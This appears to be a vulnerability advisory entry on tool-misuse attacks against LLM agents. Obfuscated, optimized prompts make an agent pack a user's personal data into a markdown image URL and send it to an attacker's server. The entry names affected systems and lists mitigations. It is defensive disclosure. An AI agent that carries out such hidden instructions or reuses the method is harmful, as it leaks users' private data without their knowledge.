Agent Tool Misuse Attacks

Description: Large Language Model (LLM) agents are vulnerable to obfuscated adversarial prompts that exploit tool misuse. These prompts, crafted through prompt optimization techniques, force the agent to execute tools (e.g., URL fetching, markdown rendering) in a way that leaks sensitive user data (e.g., PII) without the user's knowledge. The prompts are designed to be visually indistinguishable from benign prompts.

Examples: See https://imprompter.ai for code and video demonstrations. Examples include prompts that extract personally identifiable information (PII) from a chat conversation and inject it into a markdown image tag, causing the LLM agent to leak the data to an attacker-controlled server.

Impact: Confidentiality and integrity violation of user data and resources accessible to the LLM agent. This can lead to data breaches, information leakage (including PII), and unauthorized actions performed on behalf of the user.

Affected Systems: Large Language Model agents utilizing external tools (e.g., URL access, markdown rendering), including but not limited to Mistral's LeChat, ChatGLM, and agents based on Llama 3.1-70B. The vulnerability is likely present in other agents using similar architectures and tool integration mechanisms.

Mitigation Steps:

Restrict the types and capabilities of tools accessible to the LLM agent.
Implement input sanitization and validation mechanisms to detect and block potentially malicious prompts, potentially utilizing perplexity scoring (though this may not be fully reliable).
Monitor LLM agent activity for suspicious tool usage patterns.
Regularly update and patch LLM agent software and underlying models.

Agent Tool Misuse Attacks

Research Paper